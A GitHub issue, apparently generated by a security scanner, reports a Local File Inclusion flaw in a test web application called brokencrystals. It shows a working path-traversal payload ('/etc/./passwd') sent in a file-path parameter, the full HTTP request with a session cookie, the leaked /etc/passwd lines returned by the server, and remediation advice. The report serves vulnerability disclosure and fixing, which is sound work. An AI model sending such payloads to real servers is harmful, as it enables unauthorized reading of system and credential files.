Skip to content

Local File Inclusion #12

Description

@bright-security

Local File Inclusion

Severity: High Discovered: 10 of October-2022, 11:12 PM

CWE ID

CWE-22

CVSS

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Details

Local File Inclusion (also known as LFI) is the process of including files that are already located on the server by exploiting vulnerable inclusion procedures implemented in the application.
LFI occurred while injecting token "/etc/./passwd" into parameter "" in the URL.
Original URL: https://brokencrystals.com/api/file?path=config/products/crystals/amethyst.jpg&type=image/jpg
Modified URL: https://brokencrystals.com/api/filepath=%2Fetc%2F.%2Fpasswd&type=image%2Fjpg
Detected system is: Linux

Possible exposure

Data leakage, Access to unauthorized information

Remediation suggestions

The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. If this is not possible the application can maintain a white list of files, that may be included by the page, and then use an identifier (for example the index number) to access to the selected file. Any request containing an invalid identifier has to be rejected, in this way there is no attack surface for malicious users to manipulate the path.

Request

GET https://brokencrystals.com/api/file?path=%2Fetc%2F.%2Fpasswd&type=image%2Fjpg HTTP/1.1
Referer: https://brokencrystals.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Cookie: bc-calls-counter=1665443548473; connect.sid=sHyC6Ic9qPYT5MQmsUZnv3nOZL1OQaY6.l7wv3qq%2BYzKke0kaiNh473SOFW%2BDgJOpYs9CB%2BmEywo
Accept-Encoding: identity

Response

HTTP/1.1 200
Server: nginx/1.19.8
Date: Mon, 10 Oct 2022 23:12:28 GMT
Content-Type: image/jpg
Connection: keep-alive
vary: Origin
access-control-allow-origin: *
x-xss-protection: 0
strict-transport-security: max-age=0
x-content-type-options: 1
content-security-policy: default-src  * 'unsafe-inline' 'unsafe-eval'
set-cookie: bc-calls-counter=1665443548511
Content-Length: 100
Cache-Control: public, max-age=99999

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/

External links

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions